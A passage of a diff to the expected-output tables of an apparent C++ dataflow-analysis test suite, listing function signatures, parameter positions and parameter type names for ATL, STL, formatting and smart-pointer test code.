@@ -15,6 +109,18 @@ signatureMatches | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | list | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 0 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 2 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 0 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 2 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 0 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 2 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 0 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 1 | +| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 2 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 0 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 1 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 2 | 
@@ -267,7 +373,24 @@ signatureMatches | stl.h:678:33:678:38 | format | (format_string,Args &&) | | format | 1 | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | (format_string,Args &&) | | format | 0 | | stl.h:683:6:683:48 | same_signature_as_format_but_different_name | (format_string,Args &&) | | format | 1 | +| string.cpp:20:6:20:9 | sink | (char) | CComBSTR | Append | 0 | +| taint.cpp:4:6:4:21 | arithAssignments | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:249:13:249:13 | _FUN | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:249:13:249:13 | operator() | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:302:6:302:14 | myAssign2 | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:307:6:307:14 | myAssign3 | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:312:6:312:14 | myAssign4 | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| taint.cpp:523:7:523:13 | _strset | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | (LPCOLESTR,int) | CComBSTR | Append | 1 | getSignatureParameterName +| (CAtlFile &) | CAtlFile | CAtlFile | 0 | CAtlFile & | +| (CRegKey&) | CRegKey | CRegKey | 0 | CRegKey& | +| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 0 | DWORD& | +| (DWORD&,LPCTSTR) | CRegKey | QueryValue | 1 | LPCTSTR | +| (HANDLE) | CAtlFile | CAtlFile | 0 | HANDLE | +| (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | HINSTANCE | +| (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | UINT | +| (HKEY) | CRegKey | CRegKey | 0 | HKEY | | (InputIt,InputIt) | deque | assign | 0 | func:0 | | (InputIt,InputIt) | deque | assign | 1 | func:0 | | (InputIt,InputIt) | forward_list | assign | 0 | func:0 | 
@@ -288,6 +411,35 @@ getSignatureParameterName | (InputIterator,InputIterator,const Allocator &) | vector | vector | 0 | func:0 | | (InputIterator,InputIterator,const Allocator &) | vector | vector | 1 | func:0 | | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | const class:1 & | +| (LPCOLESTR) | CComBSTR | Append | 0 | LPCOLESTR | +| (LPCOLESTR) | CComBSTR | CComBSTR | 0 | LPCOLESTR | +| (LPCOLESTR,int) | CComBSTR | Append | 0 | LPCOLESTR | +| (LPCOLESTR,int) | CComBSTR | Append | 1 | int | +| (LPCSTR) | CComBSTR | Append | 0 | LPCSTR | +| (LPCSTR) | CComBSTR | CComBSTR | 0 | LPCSTR | +| (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | LPCTSTR | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 0 | LPCTSTR | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 1 | DWORD * | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 2 | void * | +| (LPCTSTR,DWORD *,void *,ULONG *) | CRegKey | QueryValue | 3 | ULONG * | +| (LPTSTR,LPCTSTR,DWORD *) | CRegKey | QueryValue | 0 | LPTSTR | +| (LPTSTR,LPCTSTR,DWORD *) | CRegKey | QueryValue | 1 | LPCTSTR | +| (LPTSTR,LPCTSTR,DWORD *) | CRegKey | QueryValue | 2 | DWORD * | +| (UINT) | CComBSTR | LoadString | 0 | UINT | +| (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | UINT | +| (char) | CComBSTR | Append | 0 | char | +| (const CComBSTR&) | CComBSTR | Append | 0 | const CComBSTR& | +| (const CComBSTR&) | CComBSTR | CComBSTR | 0 | const CComBSTR& | +| (const CComSafeArray &) | CComSafeArray | CComSafeArray | 0 | const CComSafeArray & | +| (const CComSafeArray&) | CComSafeArray | operator= | 0 | const CComSafeArray& | +| (const SAFEARRAY &) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY & | +| (const SAFEARRAY *) | CComSafeArray | Add | 0 | const SAFEARRAY * | +| (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY * | +| (const SAFEARRAY *) | CComSafeArray | operator= | 0 | const SAFEARRAY * | +| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 0 | 
const SAFEARRAYBOUND * | +| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | UINT | +| (const T &,BOOL) | CComSafeArray | Add | 0 | const class:0 & | +| (const T &,BOOL) | CComSafeArray | Add | 1 | BOOL | | (const deque &) | deque | deque | 0 | const deque & | | (const deque &,const Allocator &) | deque | deque | 0 | const deque & | | (const deque &,const Allocator &) | deque | deque | 1 | const class:1 & | @@ -348,6 +500,10 @@ getSignatureParameterName | (forward_list &&) | forward_list | forward_list | 0 | forward_list && | | (forward_list &&,const Allocator &) | forward_list | forward_list | 0 | forward_list && | | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | const class:1 & | +| (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | int | +| (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | LPCOLESTR | +| (int,LPCSTR) | CComBSTR | CComBSTR | 0 | int | +| (int,LPCSTR) | CComBSTR | CComBSTR | 1 | LPCSTR | | (list &&) | list | list | 0 | list && | | (list &&,const Allocator &) | list | list | 0 | list && | | (list &&,const Allocator &) | list | list | 1 | const class:1 & | 
@@ -374,15 +530,303 @@ getSignatureParameterName | (vector &&) | vector | vector | 0 | vector && | | (vector &&,const Allocator &) | vector | vector | 0 | vector && | | (vector &&,const Allocator &) | vector | vector | 1 | const class:1 & | +| (wchar_t) | CComBSTR | Append | 0 | wchar_t | getParameterTypeName +| arrayassignment.cpp:3:6:3:9 | sink | 0 | int | +| arrayassignment.cpp:4:6:4:9 | sink | 0 | MyInt | +| arrayassignment.cpp:5:6:5:9 | sink | 0 | MyArray | +| arrayassignment.cpp:37:7:37:7 | MyInt | 0 | const MyInt & | +| arrayassignment.cpp:44:9:44:17 | operator= | 0 | const int & | +| arrayassignment.cpp:45:9:45:17 | operator= | 0 | const MyInt & | +| arrayassignment.cpp:83:7:83:7 | MyArray | 0 | MyArray && | +| arrayassignment.cpp:83:7:83:7 | MyArray | 0 | const MyArray & | +| arrayassignment.cpp:83:7:83:7 | operator= | 0 | MyArray && | +| arrayassignment.cpp:83:7:83:7 | operator= | 0 | const MyArray & | +| arrayassignment.cpp:88:7:88:9 | get | 0 | int | +| arrayassignment.cpp:90:7:90:16 | operator[] | 0 | int | +| arrayassignment.cpp:124:6:124:9 | sink | 0 | int * | +| atl.cpp:28:8:28:8 | operator= | 0 | __POSITION && | +| atl.cpp:28:8:28:8 | operator= | 0 | const __POSITION & | +| atl.cpp:49:16:49:16 | operator= | 0 | const tagSAFEARRAYBOUND & | +| atl.cpp:49:16:49:16 | operator= | 0 | tagSAFEARRAYBOUND && | +| atl.cpp:54:16:54:16 | operator= | 0 | const tagVARIANT & | +| atl.cpp:54:16:54:16 | operator= | 0 | tagVARIANT && | +| atl.cpp:58:16:58:16 | operator= | 0 | const tagSAFEARRAY & | +| atl.cpp:58:16:58:16 | operator= | 0 | tagSAFEARRAY && | +| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | _U_STRINGorID && | +| atl.cpp:67:8:67:8 | _U_STRINGorID | 0 | const _U_STRINGorID & | +| atl.cpp:67:8:67:8 | operator= | 0 | _U_STRINGorID && | +| atl.cpp:67:8:67:8 | operator= | 0 | const _U_STRINGorID & | +| atl.cpp:68:3:68:15 | _U_STRINGorID | 0 | UINT | +| atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | LPCTSTR | +| atl.cpp:193:10:193:12 | Add | 0 | INARGTYPclass:0 | +| 
atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray & | +| atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray> & | +| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray & | +| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray> & | +| atl.cpp:198:6:198:10 | GetAt | 0 | size_t | +| atl.cpp:202:8:202:20 | InsertArrayAt | 0 | size_t | +| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray * | +| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray> * | +| atl.cpp:203:8:203:15 | InsertAt | 0 | size_t | +| atl.cpp:203:8:203:15 | InsertAt | 1 | INARGTYPclass:0 | +| atl.cpp:203:8:203:15 | InsertAt | 2 | size_t | +| atl.cpp:208:8:208:16 | SetAtGrow | 0 | size_t | +| atl.cpp:208:8:208:16 | SetAtGrow | 1 | INARGTYPclass:0 | +| atl.cpp:210:6:210:15 | operator[] | 0 | size_t | +| atl.cpp:256:3:256:10 | CAtlList | 0 | UINT | +| atl.cpp:259:12:259:18 | AddHead | 0 | INARGTYPclass:0 | +| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList * | +| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList> * | +| atl.cpp:262:12:262:18 | AddTail | 0 | INARGTYPclass:0 | +| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList * | +| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList> * | +| atl.cpp:264:12:264:15 | Find | 0 | INARGTYPclass:0 | +| atl.cpp:264:12:264:15 | Find | 1 | POSITION | +| atl.cpp:265:12:265:20 | FindIndex | 0 | size_t | +| atl.cpp:266:6:266:10 | GetAt | 0 | POSITION | +| atl.cpp:279:12:279:22 | InsertAfter | 0 | POSITION | +| atl.cpp:279:12:279:22 | InsertAfter | 1 | INARGTYPclass:0 | +| atl.cpp:280:12:280:23 | InsertBefore | 0 | POSITION | +| atl.cpp:280:12:280:23 | InsertBefore | 1 | INARGTYPclass:0 | +| atl.cpp:290:8:290:12 | SetAt | 0 | POSITION | +| atl.cpp:290:8:290:12 | SetAt | 1 | INARGTYPclass:0 | +| atl.cpp:400:8:400:8 | operator= | 0 | IUnknown && | +| atl.cpp:400:8:400:8 | operator= | 0 | const IUnknown & | +| atl.cpp:402:8:402:8 | operator= | 0 | ISequentialStream && | +| atl.cpp:402:8:402:8 | operator= | 0 | const 
ISequentialStream & | +| atl.cpp:404:8:404:8 | operator= | 0 | IStream && | +| atl.cpp:404:8:404:8 | operator= | 0 | const IStream & | +| atl.cpp:406:8:406:8 | operator= | 0 | const CComBSTR & | +| atl.cpp:408:3:408:10 | CComBSTR | 0 | const CComBSTR & | +| atl.cpp:409:3:409:10 | CComBSTR | 0 | int | +| atl.cpp:410:3:410:10 | CComBSTR | 0 | int | +| atl.cpp:410:3:410:10 | CComBSTR | 1 | LPCOLESTR | +| atl.cpp:411:3:411:10 | CComBSTR | 0 | int | +| atl.cpp:411:3:411:10 | CComBSTR | 1 | LPCSTR | +| atl.cpp:412:3:412:10 | CComBSTR | 0 | LPCOLESTR | +| atl.cpp:413:3:413:10 | CComBSTR | 0 | LPCSTR | +| atl.cpp:414:3:414:10 | CComBSTR | 0 | CComBSTR && | +| atl.cpp:417:11:417:16 | Append | 0 | const CComBSTR & | +| atl.cpp:418:11:418:16 | Append | 0 | wchar_t | +| atl.cpp:419:11:419:16 | Append | 0 | char | +| atl.cpp:420:11:420:16 | Append | 0 | LPCOLESTR | +| atl.cpp:421:11:421:16 | Append | 0 | LPCSTR | +| atl.cpp:422:11:422:16 | Append | 0 | LPCOLESTR | +| atl.cpp:422:11:422:16 | Append | 1 | int | +| atl.cpp:423:11:423:20 | AppendBSTR | 0 | BSTR | +| atl.cpp:424:11:424:21 | AppendBytes | 0 | const char * | +| atl.cpp:424:11:424:21 | AppendBytes | 1 | int | +| atl.cpp:425:11:425:21 | ArrayToBSTR | 0 | const SAFEARRAY * | +| atl.cpp:426:11:426:20 | AssignBSTR | 0 | const BSTR | +| atl.cpp:427:8:427:13 | Attach | 0 | BSTR | +| atl.cpp:428:11:428:21 | BSTRToArray | 0 | LPSAFEARRAY | +| atl.cpp:431:11:431:16 | CopyTo | 0 | BSTR * | +| atl.cpp:433:11:433:16 | CopyTo | 0 | VARIANT * | +| atl.cpp:437:8:437:17 | LoadString | 0 | HINSTANCE | +| atl.cpp:437:8:437:17 | LoadString | 1 | UINT | +| atl.cpp:438:8:438:17 | LoadString | 0 | UINT | +| atl.cpp:439:11:439:24 | ReadFromStream | 0 | IStream * | +| atl.cpp:441:11:441:23 | WriteToStream | 0 | IStream * | +| atl.cpp:446:13:446:22 | operator+= | 0 | const CComBSTR & | +| atl.cpp:447:13:447:22 | operator+= | 0 | LPCOLESTR | +| atl.cpp:537:3:537:15 | CComSafeArray | 0 | const SAFEARRAY * | +| atl.cpp:541:11:541:13 | Add | 0 | 
const SAFEARRAY * | +| atl.cpp:543:11:543:13 | Add | 0 | const class:0 & | +| atl.cpp:543:11:543:13 | Add | 0 | const int & | +| atl.cpp:543:11:543:13 | Add | 1 | BOOL | +| atl.cpp:551:6:551:10 | GetAt | 0 | LONG | +| atl.cpp:562:11:562:15 | SetAt | 0 | LONG | +| atl.cpp:562:11:562:15 | SetAt | 1 | const class:0 & | +| atl.cpp:562:11:562:15 | SetAt | 1 | const int & | +| atl.cpp:562:11:562:15 | SetAt | 2 | BOOL | +| atl.cpp:564:6:564:15 | operator[] | 0 | long | +| atl.cpp:565:6:565:15 | operator[] | 0 | int | +| atl.cpp:609:3:609:8 | CPathT | 0 | PCXSTR | +| atl.cpp:610:3:610:8 | CPathT | 0 | const CPathT & | +| atl.cpp:614:8:614:19 | AddExtension | 0 | PCXSTR | +| atl.cpp:615:8:615:13 | Append | 0 | PCXSTR | +| atl.cpp:618:8:618:14 | Combine | 0 | PCXSTR | +| atl.cpp:618:8:618:14 | Combine | 1 | PCXSTR | +| atl.cpp:619:22:619:33 | CommonPrefix | 0 | PCXSTR | +| atl.cpp:656:23:656:32 | operator+= | 0 | PCXSTR | +| atl.cpp:716:8:716:10 | Add | 0 | const class:0 & | +| atl.cpp:716:8:716:10 | Add | 0 | const int & | +| atl.cpp:717:7:717:10 | Find | 0 | const class:0 & | +| atl.cpp:717:7:717:10 | Find | 0 | const int & | +| atl.cpp:728:6:728:15 | operator[] | 0 | int | +| atl.cpp:729:21:729:29 | operator= | 0 | const CSimpleArray & | +| atl.cpp:762:8:762:10 | Add | 0 | char *const & | +| atl.cpp:762:8:762:10 | Add | 0 | const class:0 & | +| atl.cpp:762:8:762:10 | Add | 1 | const class:1 & | +| atl.cpp:762:8:762:10 | Add | 1 | wchar_t *const & | +| atl.cpp:763:7:763:13 | FindKey | 0 | char *const & | +| atl.cpp:763:7:763:13 | FindKey | 0 | const class:0 & | +| atl.cpp:764:7:764:13 | FindVal | 0 | const class:1 & | +| atl.cpp:764:7:764:13 | FindVal | 0 | wchar_t *const & | +| atl.cpp:767:9:767:18 | GetValueAt | 0 | int | +| atl.cpp:768:8:768:13 | Lookup | 0 | char *const & | +| atl.cpp:768:8:768:13 | Lookup | 0 | const class:0 & | +| atl.cpp:772:8:772:20 | ReverseLookup | 0 | const class:1 & | +| atl.cpp:772:8:772:20 | ReverseLookup | 0 | wchar_t *const & | +| 
atl.cpp:773:8:773:12 | SetAt | 0 | char *const & | +| atl.cpp:773:8:773:12 | SetAt | 0 | const class:0 & | +| atl.cpp:773:8:773:12 | SetAt | 1 | const class:1 & | +| atl.cpp:773:8:773:12 | SetAt | 1 | wchar_t *const & | +| atl.cpp:774:8:774:17 | SetAtIndex | 0 | int | +| atl.cpp:774:8:774:17 | SetAtIndex | 1 | char *const & | +| atl.cpp:774:8:774:17 | SetAtIndex | 1 | const class:0 & | +| atl.cpp:774:8:774:17 | SetAtIndex | 2 | const class:1 & | +| atl.cpp:774:8:774:17 | SetAtIndex | 2 | wchar_t *const & | +| atl.cpp:813:9:813:17 | operator= | 0 | const CUrl & | +| atl.cpp:815:3:815:6 | CUrl | 0 | const CUrl & | +| atl.cpp:818:15:818:26 | Canonicalize | 0 | DWORD | +| atl.cpp:821:8:821:15 | CrackUrl | 0 | LPCTSTR | +| atl.cpp:821:8:821:15 | CrackUrl | 1 | DWORD | +| atl.cpp:822:15:822:23 | CreateUrl | 0 | LPTSTR | +| atl.cpp:822:15:822:23 | CreateUrl | 1 | DWORD * | +| atl.cpp:822:15:822:23 | CreateUrl | 2 | DWORD | +| atl.cpp:839:15:839:26 | SetExtraInfo | 0 | LPCTSTR | +| atl.cpp:840:15:840:25 | SetHostName | 0 | LPCTSTR | +| atl.cpp:841:15:841:25 | SetPassword | 0 | LPCTSTR | +| atl.cpp:842:15:842:27 | SetPortNumber | 0 | ATL_URL_PORT | +| atl.cpp:843:15:843:23 | SetScheme | 0 | ATL_URL_SCHEME | +| atl.cpp:844:15:844:27 | SetSchemeName | 0 | LPCTSTR | +| atl.cpp:845:15:845:24 | SetUrlPath | 0 | LPCTSTR | +| atl.cpp:846:15:846:25 | SetUserName | 0 | LPCTSTR | +| bsd.cpp:6:8:6:8 | operator= | 0 | const sockaddr & | +| bsd.cpp:6:8:6:8 | operator= | 0 | sockaddr && | +| bsd.cpp:12:5:12:10 | accept | 0 | int | +| bsd.cpp:12:5:12:10 | accept | 1 | sockaddr * | +| bsd.cpp:12:5:12:10 | accept | 2 | int * | +| bsd.cpp:14:6:14:9 | sink | 0 | sockaddr | +| constructor_delegation.cpp:5:7:5:7 | MyValue | 0 | MyValue && | +| constructor_delegation.cpp:5:7:5:7 | MyValue | 0 | const MyValue & | +| constructor_delegation.cpp:5:7:5:7 | operator= | 0 | MyValue && | +| constructor_delegation.cpp:5:7:5:7 | operator= | 0 | const MyValue & | +| constructor_delegation.cpp:8:2:8:8 | 
MyValue | 0 | int | +| constructor_delegation.cpp:9:2:9:8 | MyValue | 0 | int | +| constructor_delegation.cpp:9:2:9:8 | MyValue | 1 | bool | +| constructor_delegation.cpp:10:2:10:8 | MyValue | 0 | int | +| constructor_delegation.cpp:10:2:10:8 | MyValue | 1 | int | +| constructor_delegation.cpp:11:2:11:8 | MyValue | 0 | int | +| constructor_delegation.cpp:11:2:11:8 | MyValue | 1 | bool | +| constructor_delegation.cpp:11:2:11:8 | MyValue | 2 | bool | +| constructor_delegation.cpp:16:7:16:7 | MyDerivedValue | 0 | MyDerivedValue && | +| constructor_delegation.cpp:16:7:16:7 | MyDerivedValue | 0 | const MyDerivedValue & | +| constructor_delegation.cpp:16:7:16:7 | operator= | 0 | MyDerivedValue && | +| constructor_delegation.cpp:16:7:16:7 | operator= | 0 | const MyDerivedValue & | +| constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | 0 | bool | +| constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | 1 | int | +| copyableclass.cpp:8:2:8:16 | MyCopyableClass | 0 | int | +| copyableclass.cpp:9:2:9:16 | MyCopyableClass | 0 | const MyCopyableClass & | +| copyableclass.cpp:10:19:10:27 | operator= | 0 | const MyCopyableClass & | +| copyableclass_declonly.cpp:8:2:8:24 | MyCopyableClassDeclOnly | 0 | int | +| copyableclass_declonly.cpp:9:2:9:24 | MyCopyableClassDeclOnly | 0 | const MyCopyableClassDeclOnly & | +| copyableclass_declonly.cpp:10:27:10:35 | operator= | 0 | const MyCopyableClassDeclOnly & | +| file://:0:0:0:0 | operator delete | 0 | void * | +| file://:0:0:0:0 | operator new | 0 | unsigned long | +| file://:0:0:0:0 | operator= | 0 | __va_list_tag && | +| file://:0:0:0:0 | operator= | 0 | const __va_list_tag & | +| format.cpp:3:16:3:16 | operator= | 0 | FILE && | +| format.cpp:3:16:3:16 | operator= | 0 | const FILE & | +| format.cpp:5:5:5:12 | snprintf | 0 | char * | +| format.cpp:5:5:5:12 | snprintf | 1 | size_t | +| format.cpp:5:5:5:12 | snprintf | 2 | const char * | +| format.cpp:6:5:6:11 | sprintf | 0 | char * | +| format.cpp:6:5:6:11 | sprintf | 1 | const 
char * | +| format.cpp:7:5:7:12 | swprintf | 0 | wchar_t * | +| format.cpp:7:5:7:12 | swprintf | 1 | size_t | +| format.cpp:7:5:7:12 | swprintf | 2 | const wchar_t * | +| format.cpp:14:5:14:13 | vsnprintf | 0 | char * | +| format.cpp:14:5:14:13 | vsnprintf | 1 | size_t | +| format.cpp:14:5:14:13 | vsnprintf | 2 | const char * | +| format.cpp:14:5:14:13 | vsnprintf | 3 | va_list | +| format.cpp:16:5:16:13 | mysprintf | 0 | char * | +| format.cpp:16:5:16:13 | mysprintf | 1 | size_t | +| format.cpp:16:5:16:13 | mysprintf | 2 | const char * | +| format.cpp:28:5:28:10 | sscanf | 0 | const char * | +| format.cpp:28:5:28:10 | sscanf | 1 | const char * | +| format.cpp:142:8:142:13 | strlen | 0 | const char * | +| format.cpp:143:8:143:13 | wcslen | 0 | const wchar_t * | +| format.cpp:169:6:169:9 | test | 0 | format_string | +| map.cpp:8:6:8:9 | sink | 0 | char * | +| map.cpp:9:6:9:9 | sink | 0 | const char * | +| map.cpp:10:6:10:9 | sink | 0 | bool | +| map.cpp:11:6:11:9 | sink | 0 | pair | +| map.cpp:12:6:12:9 | sink | 0 | map, allocator>> | +| map.cpp:13:6:13:9 | sink | 0 | iterator | +| map.cpp:14:6:14:9 | sink | 0 | unordered_map, equal_to, allocator>> | +| map.cpp:15:6:15:9 | sink | 0 | iterator | +| map.cpp:16:6:16:9 | sink | 0 | unordered_map, hash, equal_to, allocator>>> | +| map.cpp:17:6:17:9 | sink | 0 | iterator | +| map.cpp:442:7:442:19 | indirect_sink | 0 | int * | +| movableclass.cpp:5:7:5:7 | MyMovableClass | 0 | const MyMovableClass & | +| movableclass.cpp:5:7:5:7 | operator= | 0 | const MyMovableClass & | +| movableclass.cpp:8:2:8:15 | MyMovableClass | 0 | int | +| movableclass.cpp:9:2:9:15 | MyMovableClass | 0 | MyMovableClass && | +| movableclass.cpp:13:18:13:26 | operator= | 0 | MyMovableClass && | +| set.cpp:8:6:8:9 | sink | 0 | char * | +| set.cpp:9:6:9:9 | sink | 0 | set, allocator> | +| set.cpp:10:6:10:9 | sink | 0 | iterator | +| set.cpp:11:6:11:9 | sink | 0 | unordered_set, equal_to, allocator> | +| set.cpp:12:6:12:9 | sink | 0 | iterator | +| 
smart_pointer.cpp:4:6:4:9 | sink | 0 | int | +| smart_pointer.cpp:5:6:5:9 | sink | 0 | int * | | smart_pointer.cpp:7:27:7:30 | sink | 0 | shared_ptr & | | smart_pointer.cpp:7:27:7:30 | sink | 0 | shared_ptr & | | smart_pointer.cpp:8:27:8:30 | sink | 0 | unique_ptr & | | smart_pointer.cpp:8:27:8:30 | sink | 0 | unique_ptr & | +| smart_pointer.cpp:60:8:60:8 | operator= | 0 | A && | +| smart_pointer.cpp:60:8:60:8 | operator= | 0 | const A & | +| smart_pointer.cpp:70:6:70:14 | getNumber | 0 | shared_ptr | +| smart_pointer.cpp:80:8:80:8 | operator= | 0 | B && | +| smart_pointer.cpp:80:8:80:8 | operator= | 0 | const B & | +| smart_pointer.cpp:86:6:86:24 | test_operator_arrow | 0 | unique_ptr | +| smart_pointer.cpp:86:6:86:24 | test_operator_arrow | 1 | unique_ptr | +| smart_pointer.cpp:97:6:97:12 | taint_x | 0 | A * | +| smart_pointer.cpp:107:8:107:8 | C | 0 | C && | +| smart_pointer.cpp:107:8:107:8 | C | 0 | const C & | +| smart_pointer.cpp:107:8:107:8 | operator= | 0 | C && | +| smart_pointer.cpp:107:8:107:8 | operator= | 0 | const C & | +| smart_pointer.cpp:112:6:112:19 | taint_x_shared | 0 | shared_ptr | +| smart_pointer.cpp:116:6:116:24 | taint_x_shared_cref | 0 | const shared_ptr & | +| smart_pointer.cpp:120:6:120:18 | getNumberCRef | 0 | const shared_ptr & | +| smart_pointer.cpp:124:5:124:27 | nested_shared_ptr_taint | 0 | shared_ptr | +| smart_pointer.cpp:124:5:124:27 | nested_shared_ptr_taint | 1 | unique_ptr> | +| smart_pointer.cpp:132:5:132:32 | nested_shared_ptr_taint_cref | 0 | shared_ptr | +| smart_pointer.cpp:132:5:132:32 | nested_shared_ptr_taint_cref | 1 | unique_ptr> | +| standalone_iterators.cpp:5:6:5:9 | sink | 0 | int | +| standalone_iterators.cpp:7:7:7:7 | operator= | 0 | const int_iterator_by_typedefs & | +| standalone_iterators.cpp:7:7:7:7 | operator= | 0 | int_iterator_by_typedefs && | +| standalone_iterators.cpp:16:30:16:39 | operator++ | 0 | int | +| standalone_iterators.cpp:20:7:20:7 | operator= | 0 | const int_iterator_by_trait & | +| 
standalone_iterators.cpp:20:7:20:7 | operator= | 0 | int_iterator_by_trait && | +| standalone_iterators.cpp:23:27:23:36 | operator++ | 0 | int | +| standalone_iterators.cpp:36:7:36:7 | operator= | 0 | const non_iterator & | +| standalone_iterators.cpp:36:7:36:7 | operator= | 0 | non_iterator && | +| standalone_iterators.cpp:39:18:39:27 | operator++ | 0 | int | +| standalone_iterators.cpp:43:6:43:18 | test_typedefs | 0 | int_iterator_by_typedefs | +| standalone_iterators.cpp:49:6:49:15 | test_trait | 0 | int_iterator_by_trait | +| standalone_iterators.cpp:55:6:55:22 | test_non_iterator | 0 | non_iterator | +| standalone_iterators.cpp:63:7:63:7 | operator= | 0 | const insert_iterator_by_trait & | +| standalone_iterators.cpp:63:7:63:7 | operator= | 0 | insert_iterator_by_trait && | +| standalone_iterators.cpp:66:30:66:39 | operator++ | 0 | int | +| standalone_iterators.cpp:68:30:68:39 | operator-- | 0 | int | +| standalone_iterators.cpp:70:31:70:39 | operator= | 0 | int | +| standalone_iterators.cpp:82:7:82:7 | container | 0 | const container & | +| standalone_iterators.cpp:82:7:82:7 | container | 0 | container && | +| standalone_iterators.cpp:82:7:82:7 | operator= | 0 | const container & | +| standalone_iterators.cpp:82:7:82:7 | operator= | 0 | container && | +| standalone_iterators.cpp:88:6:88:9 | sink | 0 | container | +| standalone_iterators.cpp:102:6:102:9 | sink | 0 | insert_iterator_by_trait | +| standalone_iterators.cpp:103:27:103:36 | operator+= | 0 | insert_iterator_by_trait & | +| standalone_iterators.cpp:103:27:103:36 | operator+= | 1 | int | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | +| stl.h:29:34:29:40 | forward | 0 | remove_reference_t> & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | 
stl.h:49:3:49:10 | iterator | 0 | const iterator & | @@ -391,6 +835,8 @@ getParameterTypeName | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | +| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | +| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | 
@@ -403,59 +849,111 @@ getParameterTypeName | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | +| stl.h:56:8:56:17 | operator!= | 0 | iterator, ptrdiff_t, pair *, pair &> | | stl.h:59:12:59:20 | operator+ | 0 | int | | stl.h:60:12:60:20 | operator- | 0 | int | | stl.h:61:13:61:22 | operator+= | 0 | int | | stl.h:61:13:61:22 | operator+= | 0 | int | | stl.h:62:13:62:22 | operator-= | 0 | int | | stl.h:64:18:64:27 | operator[] | 0 | int | +| stl.h:67:9:67:9 | operator= | 0 | const input_iterator_tag & | +| stl.h:67:9:67:9 | operator= | 0 | input_iterator_tag && | +| stl.h:68:9:68:9 | operator= | 0 | const forward_iterator_tag & | +| stl.h:68:9:68:9 | operator= | 0 | forward_iterator_tag && | +| stl.h:69:9:69:9 | operator= | 0 | 